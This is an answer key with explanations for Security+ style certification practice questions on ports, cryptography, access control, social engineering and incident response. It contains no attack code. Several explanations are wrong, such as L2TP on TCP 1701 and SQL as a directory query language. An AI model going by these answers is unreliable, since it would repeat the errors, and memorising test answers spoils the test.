
Dumpster diving

OBJ-1.2: Dumpster diving involves searching through publically accessible garbage cans or recycling bins to find discarded paper, manuals, or other valuable types of information from a targeted company. This is often done as part of the reconnaissance phase before an attack is performed.

Answer 179

A

AUP

OBJ-5.1: An acceptable use policy (AUP) is a document stipulating constraints and practices that a user must agree to for access to a corporate network or the internet. For example, it may state that they must not attempt to break the security of any computer network or user, or that they cannot visit pornographic websites from their work computer.

Answer 180

A

Deterrent

OBJ-3.9: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. A corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to fully correct the vulnerability. An administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability.

Answer 181

A

The full email header from one of the spam messages

OBJ-1.2: You should first request a copy of one of the spam messages that include the full email header. By reading through the full headers of one of the messages, you can determine where the email originated from, whether it was from your email system or if it was external, and if it was a spoofed email or a legitimate email. Once this information has been analyzed, you can then continue your analysis further based on those findings, whether that be analyzing your email server, the firewalls, or other areas of concern. If enough information cannot be found by analyzing the email headers, then you will need to conduct more research to determine the best method to solve the underlying problem.

Answer 182

A

Memdump

OBJ-2.2: Memdump is a memory capture tool for forensic use. The dd tool is used to conduct forensic disk images. Wireshark is used for packet capture and analysis. Nessus is a commonly used vulnerability scanner.

Answer 183

A

FISMA

OBJ-5.8: The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or man-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPPA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

Answer 184

A

Shoulder surfing

OBJ-1.2: While all of the methods listed could be used by a malicious employee or insider to obtain another user’s passwords, shoulder surfing is the MOST likely to be used. Shoulder surfing is a type of social engineering technique used to obtain information such as personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder. Since a malicious employee or insider can work in close proximity to their victims (other users), they could easily use this technique to collect the passwords of the victimized users.

Answer 185

A

LDAP

OBJ-4.2: LDAP can be used for single sign-on but is not a shared authentication protocol. OpenID, OAuth, and Facebook Connect are all shared authentication protocols. Open ID Connect (OIDC) is an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields. OAuth is designed to facilitate the sharing of information (resources) within a user profile between sites.

Answer 186

A

25

OBJ-2.6: Email servers rely on port 25 to send emails out of the network. Port 25 must be set to OPEN or ALLOW in the firewall in order for SMTP (sendmail transfer protocol) to function properly. Port 22 is SSH, Port 80 is HTTP, and Port 143 is IMAP.

Answer 187

A

Discretionary access control model

Correct Answer:
Discretionary access control enables a user who has created or owns an object, such as a file or folder, the discretion to assign permissions for that object to anyone they choose.
Incorrect Answers:
Mandatory access control models use labels and security clearances to grant access to objects.
Rule-based access control models use a specific set of rules that control the interaction between users and objects.
Role-based access control models use defined roles with specific rights and permissions assigned to those roles to control access to objects.

Answer 188

A

EAP-TLS needs server and client certifcates; EAP-TTLS only needs server certifcates.

Correct Answer:
EAP-TLS needs server and client certifcates; EAP-TTLS only needs server certifcates.
Incorrect Answers:
The EAP standard does not define the use of signed or unsigned certificates, although most implementations require signed certificates.

Answer 189

A

Supervisory control and data acquisition

Correct Answer:
Supervisory control and data acquisition (SCADA) systems are used to control and manage heating, ventilation, air-conditioning, and other types of industrial and environmental systems.
Incorrect Answers:
Minicomputers are antiquated computers that performed advanced tasks in the place of mainframe systems and are no longer widely in use.
Although some SCADA systems could be embedded, embedded hosts normally refer to systems that have operating systems burned into their computer chips.
Mainframe systems normally do not control industrial types of systems, such as heating, ventilation, and air-conditioning.

Answer 190

A

Deterrent control

Correct Answer:
A deterrent control keeps someone from performing a malicious act, provided that he or she knows the control is there and is aware of the consequences for violating it.
Incorrect Answers:
The difference between a deterrent control and a preventive control is that it is necessary for a potential attacker to have knowledge of the deterrent control for it to be effective. Users do not have to have knowledge of a preventative control for it to function.
A corrective control is used to correct a condition when there is either no control at all, or when the existing control is ineffective. Normally, a corrective control is temporary until a more permanent solution is put into place.
A compensating control assists and mitigates the risk when an existing control is unable to do so.

Answer 191

A

Impact, Probability

Correct Answers:
Probability and impact values are evaluated and assessed during a risk assessment.
Incorrect Answers:
Threats and vulnerabilities do not have defined values.

Answer 192

A

HTML attachment

Correct Answer:
Any form of attachment is a risk. An HTML attachment is basically an HTML file that comes attached to an e-mail message. When a user clicks this attachment, it automatically spawns a browser session and could connect to a malicious Web site. Once the user is connected to the site, malicious code can be downloaded onto the user’s browser.
Incorrect Answers:
Neither cookies, locally shared objects, nor cross-site scripts are attached to e-mail messages.

Answer 193

A

Jamming

Correct Answer:
Jamming is an intentional interference with the signal of a wireless network. It is often part of a DoS attack.
Incorrect Answers:
An evil twin attack is a rogue wireless access point set up to be nearly identical to a legitimate access point.
SSID cloaking is a weak security measure designed to hide the broadcasting of a wireless network’s service set identifier.
MAC spoofing is an attempt to impersonate another host by using its MAC address.

Answer 194

A

Clickjacking

Correct Answer:
Clickjacking is almost never seen anymore as it’s easy to detect this type of attack.
incorrect Answers:
Header manipulation means to add malicious information to HTTP headers.
A man-in-the-browser attack means to add malicious information or code, often by using a Trojan horse.
Buffer overflows attempt to access privilege escalation by forcing a buffer to cause an error.

Answer 195

A

TCP port 1701

Correct Answer:
L2TP aligns to TCP port 1701, allowing secure remote access to a system through a VPN connection.
Incorrect Answer:
UDP port 53 aligns to the Domain Name Service (DNS), UDP port 123 is used by Network Time Protocol (NTP) services, and TCP port 443 is used by HTTP over SSL.

Answer 196

A

Patch management

Correct Answer:
Patch management is the formal effort designed to remediate vulnerabilities and other software flaws on a regular basis.
Incorrect Answers:
Managing upgrades is part of a formal change and configuration management process.
Account management is the process of provisioning and maintaining user accounts on the system.
Change management is a formalized process that involves both long-term and short-term infrastructure changes, as well as configuration changes to hosts and networks.

Answer 197

A

PGP

Correct Answer:
Pretty good privacy, or PGP, is commonly used between individuals or small groups of people, and it normally does not require a public key infrastructure. It uses a web of trust model, which means that each individual has to be able to trust every other individual who uses PGP to encrypt and decrypt data sent and received by them.
Incorrect Answers:
RSA is the de-facto key generation protocol used in public key cryptography, and it is normally used in a public key infrastructure type of environment.
Diffie-Hellman Exchange (DHE) is a key negotiation and agreement protocol that is used to exchange keys and establish a secure communications session.
AES is a symmetric key protocol not used in public key cryptography.

Answer 198

A

Logic bomb

Correct Answer:
A logic bomb is simply a script that is set to execute at a certain time. Logic bombs are usually created by rogue administrators or disgruntled employees.
Incorrect Answers:
A virus is a piece of malicious software that must be propagated through a definite user action.
A Trojan horse is a piece of software that seems to be of value to the user, but in reality is malware.
Adware is usually annoying advertisements that come in the form of pop-up messages in a user?s browser.

Answer 199

A

Session cookies

Correct Answer:
Session cookies are used for a single Web browsing session only and are generally not carried across Web sessions.
Incorrect Answers:
Persistent cookies are saved and used between various Web sessions.
Locally shared objects, also called flash cookies, are used for Web sites that use Adobe Flash content, and they can be persistent.

Answer 200

A

Codebook

Correct Answer:
Codes are representations of an entire phrase or sentence, where ciphers are encrypted on a character-by-character basis. A codebook is needed to translate coded phrases into their true plaintext meanings.
Incorrect Answers:
A symmetric key is used to encrypt ciphers, not codes, as are algorithms and asymmetric keys.

Answer 201

A

Deauthentication attack

Correct Answer:
A deauthentication attack involves sending specially-crafted traffic to both a wireless client and an access point, in the hopes of causing them to deauthenticate with each other and disconnect.
Incorrect Answers:
A spoofing attack involves impersonating a wireless client or access point, either through its IP or MAC address.
A replay attack involves the reuse of intercepted non-secure credentials to gain access to a system or network.
Initialization vector (IV) attacks involve attempting to break WEP keys by targeting their weak IVs.

Answer 202

A

As resources decrease, both functionality and security decrease.
As security increases, functionality decreases.

Correct Answers:
The relationship between security and functionality is inversely proportional. As one increases, the other decreases. The relationship between resources and both security and functionality is directly proportional. As resources increase, so do both functionality and security. If resources decrease, so do functionality and security.
Incorrect Answers:
If functionality increases, security generally decreases.
If resources increase, both security and functionality increase as well.

Answer 203

A

Snapshot

Correct Answer:
A snapshot is a quick backup of critical configuration files, used by the hypervisor to restore the virtual machine back to its point-in-time status should it become unstable or suffer any other issues.
Incorrect Answers:
Differential and incremental backups apply to entire systems and are used to back up only files that have changed since the last full backup.
The system state backup is a Microsoft Windows type of backup that backs up critical files used by the operating system to restore it in the event of a system crash or other issue.
Virtual machines can make use of all of these other types of backups, but they are not used by the hypervisor to restore the VM itself.

Answer 204

A

Authentication

Correct Answer:
Authentication is the process of validating that a user?s credentials are authentic, after the user has presented them through the identification process.
Incorrect Answers:
Authorization is the process of controlling access to resources through methods that include permissions, rights, and privileges.
Auditing is the process of reviewing logs and other audit trails to determine what actions have been performed on systems and data.
Accountability uses auditing to ensure that users are traced to and held responsible for their actions.

Answer 205

A

Detection and analysis

Correct Answer:
Detection and analysis is the second step of the incident response life cycle.
Incorrect Answers:
In order, the steps of the incident response life cycle are preparation; detection and analysis; containment, eradication, and recovery; and post-incident activity.

Answer 206

A

Notifying and coordinating with senior management and law enforcement officials

Correct Answer:
Notifying and coordinating with senior management and law enforcement officials is normally the job of a senior leader within the incident response team.
Incorrect Answers:
The primary job of a first responder is to secure the scene. They are also responsible for notifying the incident response team and initially determining the scope, seriousness, and impact of the incident.

Answer 207

A

Documentation review

Correct Answer:
The documentation review is the simplest form of test. In this type of test, the business continuity plan, disaster recovery plan, and associated documents are reviewed by relevant personnel including managers, recovery team members, and anyone else who may have responsibilities directly affecting plans.
Incorrect Answers:
A tabletop exercise is a type of group review.
In a full-scale test, all personnel are usually involved and may actually conduct activities as they would during a real incident. This type of test is more complex and normally requires extensive resources, such as people and equipment, so it is typically conducted infrequently.
In a walkthrough test, team members go through the motions of fulfilling the responsibilities and conducting the activities required during an incident or disaster.

Answer 208

A

ECDH

Correct Answer:
Elliptic Curve Diffie-Hellman (ECDH) is a key exchange protocol used in public key cryptography. It is used to negotiate, agree upon, and establish a secure session between two parties.
Incorrect Answers:
RSA (Rivest-Shamir-Adleman) is the most common public-private key generation algorithm used in public key cryptography. It is used to generate a public and private key pair.
AES is the Advanced Encryption Standard, and it is not used in public key cryptography; it is a symmetric key cryptography algorithm.
SHA-2 is the second iteration of the Secure Hashing Algorithm and is used to generate message digests for plaintext. It is not used in public key cryptography to exchange keys or establish secure sessions.

Answer 209

A

Mean time to failure

Correct Answer:
The mean time to failure (MTTF) is the length of time a device is expected to last in operation. In MTTF, only a single, definitive failure will occur and will require that the device be replaced rather than repaired.
Incorrect Answer:
Mean time between failures (MTBF) represents the manufacturer’s best guess (based on historical data) regarding how much time will pass between major failures of that component. This assumes that more than one failure will occur, which means that the component will be repaired, rather than replaced.
Mean time to recovery (MTTR) is the amount of time it takes for a hardware component to recover from failure.
Mean time to replace is not a valid term.

Answer 210

A

64-bit

Correct Anwer:
WEP key sizes are 64-bits (40-bit key and 24-bit initialization vector) or 128-bit (104-bit key and 24-bit initialization vector). The 802.11b standard called for a 64-bit key.
Incorrect Answers:
Neither 512-bit nor 256-bit are valid WEP key sizes.
The original 802.11b standard called for a 64-bit key; the 128-bit key was developed after this standard was issued.

Answer 211

A

MAC filtering logs

Correct Answers:
MAC addresses can be spoofed, so examining MAC address on filtering logs may not provide any indication of whether a host is authorized or not.
Incorrect Answers:
All of these are valid methods of detecting rogue hosts that connect to the network.

Answer 212

A

Credential validation

Correct Answer:
Validating credentials is an important aspect of authentication, not authorization.
incorrect Answers:
All of these elements directly support authorization.

Answer 213

A

Coercion

Correct Answer:
Coercion attacks generally require direct confrontation with the victim, so they are usually detected.
Incorrect Answers:
All of these attacks may go undetected by the victim, because they may not require any direct interaction with the target and can be performed subtly by the attacker without the victim noticing.

Answer 214

A

Rijindael

Correct Answer:
Rijindael was selected as the winner of the NIST competition and became the U.S. government?s Advanced Encryption Standard (AES).
Incorrect Answers:
Twofish, another symmetric algorithm, was one of the five finalists for the competition, but it did not win.
Blowfish is also symmetric algorithm, but was not considered in the competition to be the AES.
RC4 is a symmetric streaming cipher commonly seen in WEP and SSL implementations. It was not one of the finalists involved in the AES competition.

Answer 215

A

User-dependent security

Correct Answer:
The organization should not depend solely upon the users to manage security and static devices, because these devices can be managed just as traditional hosts and network devices are.
Incorrect Answers:
These are all valid methods of securing static hosts in an organization.

Answer 216

A

ECB

Correct Answer:
With ECB mode, a given piece of plaintext will always produce the same corresponding piece of ciphertext. This predicability makes it weak.
Incorrect Answers:
While CBC, OFB, and CTR mode go about the processes in different ways, these modes lack ECB’s predicability, adding strength to the underlying cryptosystem.

Answer 217

A

Ipsec

Correct Answers:
IPsec provides encryption, integrity, and authentication for data tunneled over VPNs across public networks.
Incorrect Answers:
S/MIME is used for encrypting e-mail
SSH allows secure remote access
MD5 facilitates hashes to allow for integrity.

Answer 218

A

Ciphertext

Correct Answer:
Ciphertext is a result of the encryption process; it is encrypted text.
Incorrect Answers:
Plaintext is unencrypted text.
A hash or message digest is a cryptographic representation of variable length text, but it is not the text itself.

Answer 219

A

Information classification

Correct Answer:
An organization’s information classification policy not only outlines what level of security protections certain data receives, but it also serves to instruct employees on how to treat sensitive data.
Incorrect Answers:
Clean desk policies, which instruct employees to not leave sensitive data unattended, as well as data disposal policies, can be included in the information and data handling policies, but these are very specific instances and don’t cover all information or all scenarios where an employee would be in a position to treat data with care.
Protection of personally identifiable information on social media would be part of an organization’s social media policy.

Answer 220

A

48-bit

Correct Answer:
The IV size for TKIP is 48-bit.
Incorrect Answers:
The only valid IV size for TKIP is 48-bit.

Answer 221

A

Kerberos

Correct Answer:
Kerberos is an authentication protocol used in Windows Active Directory. It uses a series of tickets and timestamps to authenticate individuals and prevent replay attacks.
Incorrect Answers:
MS-CHAP is a Microsoft version of the Challenge Handshake Authentication Protocol, used in earlier versions of Windows. It uses challenges and password hashes to authenticate individuals.
EAP, the Extensible Authentication Protocol, is an authentication framework that can use several other protocols for secure access across both wired and wireless networks.
SESAME (Secure European System for Applications in a Multivendor Environment) is a European-developed authentication protocol that can provide for single sign-on capability. It is not widely used and does not use tickets for authentication.

Answer 222

A

The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident.

Correct Answers:
The RPO is the maximum allowable amount of data (measured in terms of time) that the organization can afford to lose during a disaster or an incident.
Incorrect Answers:
The RPO is the maximum amount of data, not the minimum, that can be lost during a disaster or an incident.
RPO refers to data that can be lost, not time itself.
RPO is measured in time, not gigabytes.

Answer 223

A

Security testing

Correct Answer:
During the secure testing phase of the secure software development model, software is measured or tested against security, functional, and performance requirements. This may include secure code review, application fuzzing, and vulnerability assessments, as well as penetration testing.
Incorrect Answers:
In the secure design stage, different security functionality is designed into the application.
In the security requirements stage, requirements for different security functions are determined.
During secure implementation of software, security requirements are validated as implemented in the application.

Answer 224

A

FTPS

Correct Answer:
FTPS is a secure version of the non-secure FTP protocol and is used over SSL or TLS connections to ensure security when transferring files to or from an Internet-based host.
Incorrect Answers:
FTP is a non-secure protocol used to copy files to and from Internet-based hosts.
SCP is a secure copy protocol used to copy files securely to and from a networked host, and it uses SSH.
SFTP is a secure file transfer protocol used to copy files to and from an Internet-based host, and it also uses SSH.

Answer 225

A

Blacklisting

Correct Answer:
Blacklisting is a technique that involves an administrator adding undesirable or restricted software or applications to a list on content filtering devices, in group policy, or through some other type of mechanism. This ensures that users are not allowed to download, install, or execute these particular applications.
Incorrect Answers:
Whitelisting is the opposite of blacklisting; applications that users are allowed to download, install, and execute are added to a whitelist.
There is no such term as graylisting.
Filtering typically involves checking traffic on a network device based upon specific characteristics. The term normally does not apply to software or applications.

Answer 226

A

99.99 percent availability

Correct Answers
99.99 percent availability accounts for 52 minutes of downtime per year.
Incorrect Answers:
99.999 percent availability allows only 5.26 minutes of downtime per year, which may not be enough if the server requires almost an hour of maintenance time.
99.9 percent availability equates to more than 8 hours of downtime per year and exceeds the stated requirement.
99 percent availability is more than 3 days of downtime per year, far exceeding the requirement for no more than 1 hour of downtime.

Answer 227

A

Public

Correct Answer:
A public cloud is operated by a third-party provider who leases space in the cloud to anyone who needs it.
Incorrect Answers:
An external cloud is not a valid type of cloud and could be a public, private, or community cloud.
A private cloud is for use only by one organization and is usually hosted by that organization?s infrastructure.
A community cloud is for use by similar organizations or communities, such as universities or hospitals, that need to share common data.

Answer 228

A

Dawn’s public key

Correct Answer:
To encrypt information that Dawn can decrypt, using public and private key pairs, Bobby would need Dawn’s public key to encrypt data that only her private key can decrypt.
Incorrect Answers:
Encrypting with Bobby’s public key would allow only Bobby’s private key to decrypt the data, and only he would possess that.
Bobby would not possess Dawn’s private key to encrypt data to her, and then only her public key, which everyone would have, would be able to decrypt it, so there would be no confidentiality involved.
Bobby would not use his private key to encrypt data, because only his public key can decrypt it, and everyone could have that key, so no confidentiality would be assured.

Answer 229

A

MAC address filtering

Correct Answer:
Filtering by the MAC address ensures that only specific systems can access the wireless network based on the MAC address generally presented by the network card. That address is added into a list of systems that can connect (or not).
Incorrect Answers:
Encryption technologies cannot stop specific systems from entering the network on its own.
Disabling the SSID broadcast cannot stop systems from connecting if they determine the SSID through other means.

Answer 230

A

16

Correct Answer:
DES uses 16 rounds of encryption.
Incorrect Answers:
DES does not use 32,64, or 128 rounds of encryption or decryption processes.

Answer 231

A

SNMP

Correct Answers:
The Simple Network Management Protocol (SNMP) uses SNMP agents that respond to queries to report their status to a central program manager.
Incorrect Answers:
These protocols are not used to manage network devices.

Answer 232

A

Content filter

Correct Answer:
Content filters can scan content as it leaves the network, checking for certain types of content that has been pre-specified within the software.
Incorrect Answers:
The other choices are incorrect because those technologies will not content-filter messages.
Antispam filters are used to catch and quarantine spam messages.
Caching proxy servers are used to cache, or store, messages for speedy retrieval in the future.
Firewalls help control and block (when necessary) network traffic at the ingress and egress points.

Answer 233

A

Round robin

Correct Answer:
Round robin is a turn-based scheduling method where jobs are assigned to servers in sequential order.
Incorrect Answers:
Affinity scheduling means that the load balancer keeps a client’s sessions connected to the server that’s keeping the session.
On demand and First come are meaningless terms created from the depths of your test writer’s mind.

Answer 234

A

Telecommunication companies

Correct Answer:
Telecoms use Interconnection Service Agreements.
Incorrect Answers:
Government entities use MOUs because contracts are not the primary method of agreements between entities of the same government but they do not use Interconnection Service Agreements because they don’t run or manage Internet or Telecom traffic..

Answer 235

A

53

Correct Answers:
DNS uses TCP and UDP port 53, so this port should be left open.
Incorrect Answers:
All other unnecessary ports should be closed.
Port 22 is used by SSH. Port 25 is used by SMTP.
Port 80 is used by HTTP.

Answer 236

A

Sandboxing

Correct Answer:
Sandboxing separates applications from one another and does not allow them to share execution, user, or data space.
Incorrect Answers:
Whitelisting enables an administrator to determine which applications and other software the user is allowed to install and execute.
Containerization is a technique used to separate different sensitivities of data, such as corporate and personal data on a mobile device.
Blacklisting is a method that enables administrators to restrict users from installing and executing certain applications.

Answer 237

A

Threats exploit vulnerabilities.

Correct Answer:
Threats exploit vulnerabilities.The relationship between the elements of risk are as follows: threat actors initiate threats, which in turn exploit vulnerabilities.
Incorrect Answers:
All other answers are incorrect.

Answer 238

A

Lack of control

Correct Answer:
Lack of control over data and the infrastructure is probably the greatest risk to cloud computing.
Incorrect Answers:
Accountability and responsibility can be established through effective security controls and well-written service-level agreements.
Cloud computing usually increases availability of data for users, since it is typically built on highly available, redundant infrastructures.

Answer 239

A

WEP

Correct Answer:
WEP is a legacy wireless encryption protocol that has been determined to be very weak and easily broken. It uses the RC4 streaming protocol and weak initialization vectors (24-bit) to encrypt data on wireless networks.
Incorrect Answers:
WPA2 is an advanced encryption protocol that uses AES.
WPA was an interim protocol used to correct some of WEP’s weaknesses. It uses the TKIP protocol.
802.1X is a port-based authentication method, not a wireless encryption protocol.

Answer 240

A

Acceptable-use policy

Correct Answer:
An acceptable-use policy details what is (and is not) acceptable for users to do during their working hours, including personal use and unacceptable activities on the company network, such as gambling and pornography.
Incorrect Answers:
Due care is an act performed by the company itself, and is not a user policy.
Service level agreements are made between a company and a third party, such as a contractor or a supplier.
Access control policies help protect against unauthorized access, both physical and logical, but they don’t discuss how users can and cannot use systems.

Answer 241

A

LDAP

Correct Answer:
The Lightweight Directory Application Protocol (LDAP) uses TCP port 389.
Incorrect Answers:
SQL is a query language for directories.
HTTPS is the secure HTTP protocol for Web pages.
TLS is an authentication/encryption protocol.

Answer 242

A

Hashes are decrypted using the same algorithm and key that encrypted them.

Correct Answer:
Hashes are produced from one-way mathematical functions and cannot be decrypted.
Incorrect Answers:
All of these are characteristics of hashing.

Answer 243

A

Risk likelihood and impact

Correct Answer:
The risk likelihood and impact should directly determine how much you budget for controls to prevent the occurrence of risk.
Incorrect Answers:
Asset identification does not require analysis of cost.
Risk likelihood and impact are more accurate than threat of natural disaster and qualitative costs in determining how much a solution will actually cost.

Answer 244

A

Anomaly-based system

Correct Answers:
Anomaly-based systems detect unusual network traffic patterns based upon a baseline of normal network traffic.
Incorrect Answers:
Rule-based systems use predefined rule sets.
Signature-based systems use predefined traffic signatures that are typically downloaded from a vendor.
Filter-based systems, such as routers and firewalls, base detection on access control lists that specify traffic that is permitted and denied.

Answer 245

A

Double-blind test

Correct Answer:
In a double-blind test, testers have no prior knowledge of the network they are testing, and network defenders have no prior knowledge of the test and aren’t aware of any attacks unless they can detect and defend against them. This test is designed to test the defenders’ abilities to detect and respond to attacks and to test and exploit vulnerabilities on the network.
Incorrect Answers:
In a black box test, only the testers have no knowledge of details about this network configuration. This type of test is also referred to as a blind test.
In a gray box test, the penetration tester may have some limited knowledge of the network or systems, gained from the organization that wants the test.

Answer 246

A

Security requirements

Correct Answer:
In the security requirements stage, requirements for different security functions are determined. Iterations of interviews and surveys might be developed and gathered and diagrams developed to show project milestones.
Incorrect Answers:
During the secure testing phase of the secure software development model, software is measured or tested against security, functional, and performance requirements. This may include secure code review, application fuzzing, and vulnerability assessments, as well as penetration testing.
In the secure design stage, different security functionality is designed into the application.
During the secure implementation of software, security requirements are validated as implemented in the application.

Answer 247

A

SELinux

Correct Answer:
SELinux is the only example, from the answers given, of a trusted operating system.
Incorrect Answers:
These operating systems are not considered trusted operating systems, although they can be hardened to varying degrees.

Answer 248

A

Signage should indicate security checkpoints to report to in the event of an emergency requiring evacuation.

Correct Answer:
Signage should indicate the location and route to emergency evacuation exits, not security checkpoints, in the event of an emergency requiring evacuation.
Incorrect Answers:
All of these are valid characteristics of good signage.

Answer 249

A

RADIUS uses TCP port 1812.

Correct Answer:
RADIUS does not use TCP.
Incorrect Answers:
All of these are characteristics of the RADIUS protocol.

Answer 250

A

Halon

Correct Answer:
Halon is a dangerous chemical that was previously used in data centers to suppress fires. However, it was banned in 1987 because it is also dangerous to human beings.
Incorrect Answers:
Water is still used to combat certain classes of fires.
Carbon dioxide is used to combat both liquid and electrical fires.
FM-200 has generally replaced Halon in data center fire suppression systems.

Answer 251

A

Tailgating

Correct Answer:
A tailgating person might use some sort of creative pretext to convince someone to open the door and allow him or her to enter without proper identification.
Incorrect Answers:
Neither shoulder surfing nor dumpster diving are attempts to enter a facility.
Impersonation could be used to enter a facility, but it is not being used to do so in this case.

Answer 252

A

Minimum password age

Correct Answer:
The minimum password age setting is used to force users to use a password for a minimum amount of time before they are allowed to change it. This prevents them from rapidly cycling through the password history to reuse an older password.
Incorrect Answers:
Password history simply records a previous number of passwords, so that they cannot be reused in the system.
The maximum password age is used to expire a password after a certain time period.
Password complexity enforces the use of longer password lengths and character spaces, increasing password strength.

Answer 253

A

SSL, TLS
Correct Answers:
Both Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols are used to encrypt traffic sent over untrusted networks, such as the Internet.
Incorrect Answers:
Both use TCP port 443.SCP is part of the SSH protocol suite and is used to copy files securely from one host to another.
SSH is a protocol used to connect to and administer hosts remotely.
Both SCP and SSH use TCP port 22. UDP uses UDP port 69 and is totally unsecure.

Answer 254

A

The error caused from rejecting someone who is in fact an authorized user
Type I error

Correct Answer:
A false reject rate (FRR) is the error caused from rejecting an authorized user; it is also called a Type I error.
Incorrect Answer:
A false acceptance rate (FAR) is the error caused when an unauthorized user is validated as authorized, also referred to as a Type II error.

Answer 255

A

Access control list

Correct Answer:
An access control list (ACL) is a physical or logical list that details specific access levels individuals or entities may have when interacting with objects. An ACL is also used on network devices to determine how traffic from various users can enter and exit a network device and access internal hosts.
Incorrect Answers:
Access approval lists and metadata tables are distractors and are not valid terms.
Rule-based access control is an access control model based upon various access control rules that apply to users, objects, and actions.

Answer 256

A

Near-field communication (NFC)

Correct Answer:
Near-field communication is enables devices to send very low-power radio signals to each other by using a special chip implanted in the device. This technology requires that the devices be extremely close or even touching each other. This technology is used for a wide variety of applications, including payments through NFC-enabled smartphones.
Incorrect Answers:
Neither 802.11 wireless nor Bluetooth technologies are used in this manner.
Infrared does not use radio frequency technology; it enables communications between devices using a beam of light.

Answer 257

A

Flood attack

Correct Answer:
A flood is a type of network attack based upon confusing a switch with ICMP traffic.
Incorrect Answers:
Malware would not cause a large volume of ICMP segments to be sent to a host.
A man-in-the-middle attack attempts to break into an existing communications session, and is not a denial-of service attack.
A phishing attack is a form of social engineering attack using e-mail.

Answer 258

A

OCSP

Correct Answer:
The Online Certificate Status Protocol (OCSP) is used to obtain the revocation status of digital certificates. It is used as an alternative to certificate revocation lists and enables clients to request and receive the electronic status of digital certificates automatically and in real-time.
Incorrect Answers:
Diffie-Hellman Exchange (DHE) is a key negotiation and agreement protocol used in public key cryptography.
RSA is the de facto standard used to generate public and private key pairs in a PKI.
Elliptic curve cryptography (ECC) is a public key cryptography protocol used on small mobile devices, due to its low power and computing requirements.

Answer 259

A

dig, nslookup
Correct Answers:
Both dig and nslookup are designed to query DNS servers.
Incorrect Answers:
One might argue that Nmap and ping might be used to diagnose DNS, but neither of them are specifically for DNS queries.
Kali is a Linux distro, not a utility.

Answer 260

A

PAP

Correct Answer:
The Password Authentication Protocol (PAP) is an older authentication method that passes usernames and passwords in clear text. For this reason, it is no longer used.
Incorrect Answers:
CHAP, the Challenge Handshake Authentication Protocol, uses password hashes and challenge methods to authenticate to the system. Passwords are not passed in clear text with this protocol.
MS-CHAP (Microsoft CHAP) is a Microsoft proprietary version of CHAP, native to Windows systems.
The Extensible Authentication Protocol (EAP) is a modern authentication framework that can use various authentication methods. It also does not pass username and password information in clear text.

Answer 261

A

Refactoring

Correct Answer:
A refactored driver will work correctly, but might also perform other, malicious actions.
Incorrect Answers:
Man-in-the-middle might be a result of the refactor, but is not the threat itself.
Version control refers to formally tracking different versions of the baseline configuration.
Shimming is a library that responds to inputs that the original device driver isn?t designed to handle and would require a separate file.

Answer 262

A

IMAPS

Correct Answer:
IMAPS (secure IMAP) is a secure version of the IMAP4 protocol used over SSL or TLS connections to provide for client e-mail security.
Incorrect Answers:
SMTP is a server-side e-mail protocol and is not used over SSL or TLS. SMTP uses TCP port 25.
POP3 is a non-secure client-side e-mail protocol that uses TCP port 110.
IMAP4 is a non-secure client-side e-mail protocol that uses TCP port 143.

Answer 263

A

Decentralized

Correct Answers:
Decentralized log management means that logs are managed and reviewed on a host-by-host basis, rather than as a centralized, consolidated group.
Incorrect Answers:
Centralized log management involves collecting logs from across the network into a system and reviewing then as a group.
Security Information Event Management (SIEM) is a centralized method of obtaining logs and other data from disparate devices across a network.
Syslog is a logging tool found in UNIX and Linux systems, which can be used either on a centralized or decentralized basis.

Answer 264

A

An attack that exceeds the memory allocated to an application for a particular function, causing it to crash.

Correct Answer:
CoA buffer overflow attack is an attack that exceeds the memory allocated to an application for a particular function, causing it to crash.
Incorrect Answers:
While similar to a buffer overflow attack, an integer overflow attack uses unexpected numerical results from a mathematical operation to overflow a buffer.
An SQL injection attack is an attack on a database through vulnerabilities in the Web application, usually in user input fields.
An XML injection attack involves sending malicious XML content to a Web application, taking advantage of any lack of input validation and XML parsing.

Answer 265

A

Geotagging

Correct Answers:
Geotagging is the practice of marking media files, such as pictures and video, with relevant information such as geographic location (using the GPS features of the mobile device) and time. This information can be used by security professionals to track where and how a mobile device has been used.
Incorrect Answers:
Remote management is the overall process of remotely managing and monitoring mobile devices that are used to connect to the corporate infrastructure.
Geolocation is the use of a device’s GPS features to determine device location, to locate points of interest, and to gather other useful information. Although it can be used to geotag media, it is not the same as geotagging.
Geofencing is the use of geolocation features to ensure that a mobile device does not leave specific areas of corporate property.

Answer 266

A

Lack of input validation

Correct Answer:
A lack of input validation in the Web form field may allow certain types of attacks to take place when a user enters malicious or incorrect characters in the form.
Incorrect Answers:
Permissions do not affect the quality or type of input in the field, only who can access and perform actions on the form.
Adequate memory in a buffer cannot perform input validation functions.
Properly formatted HTML cannot perform input validation on a form field.

Answer 267

A

Key stretching

Correct Answer:
Key stretching is a technique used to change weak keys into stronger ones by feeding them into an algorithm to produce enhanced keys.
Incorrect Answers:
Key streaming involves sending individual characters of the key through an algorithm and using mathematical XOR function to change the output.
Key repetition is not a valid answer or term.
Key exchange involves generating and exchanging a asymmetric key used for a particular communications session, or exchanging public keys in order to use them for public key cryptography.

Answer 268

A

Hypervisor

Correct Answer:
A hypervisor, also called a virtual machine monitor, is application software responsible for creating and managing virtual machines and their associated files on a host.
Incorrect Answers:
The host operating system does not create or manage virtual machines; it merely shares resources with them.
The guest operating system is the virtual machine itself and is managed by a hypervisor.
A load balancer is other software or a hardware appliance responsible for balancing user requests and network traffic among several different physical or virtualized hosts.

Answer 269

A

Vulnerability assessment

Correct Answer:
A vulnerability assessment looks for weaknesses in systems.
Incorrect Answers:
